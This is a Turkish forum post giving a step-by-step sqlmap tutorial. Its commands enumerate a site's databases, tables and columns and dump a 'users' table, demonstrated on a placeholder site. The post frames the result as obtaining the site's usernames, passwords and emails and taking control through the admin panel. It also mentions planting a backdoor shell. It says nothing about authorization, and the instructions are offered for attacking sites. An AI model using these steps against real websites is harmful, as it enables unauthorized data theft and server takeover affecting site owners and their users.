anonymous
Kayıtlı Üye
- Katılım
- 26 Aralık 2020
- Mesajlar
- 67
- Tepkime puanı
- 108
- İlgi Alanlarınız
- pentest
- Cinsiyet
-
- Erkek
Sqlmap nedir?
Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar. Sqlmap nedir?
Sqlmap ile ne yapabilirim?
-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmekSqlmap ile ne yapabilirim?
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.
Sqlmap nasıl kullanılır?
Sqlmap nasıl kullanılır?
Sqlmap ile siteleri kontrol etmek için
Kod:
sqlmap -u URL
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8
Sqlmap ile Database Listelenmesi ve Dump Edilmesi
Database listeleyebilmek için -dbs parametresi kullanılır.Sqlmap ile Database Listelenmesi ve Dump Edilmesi
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs
Database İçerisinden Bilgileri Almak
Örneğin orneksite.org sitesi için iki veritabanı bulunduMain_wellerpools veritabanındaki tabloların listesini almak istiyorum
Kod:
sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables
Tabloların listesi
Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns
Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump
Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz
Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar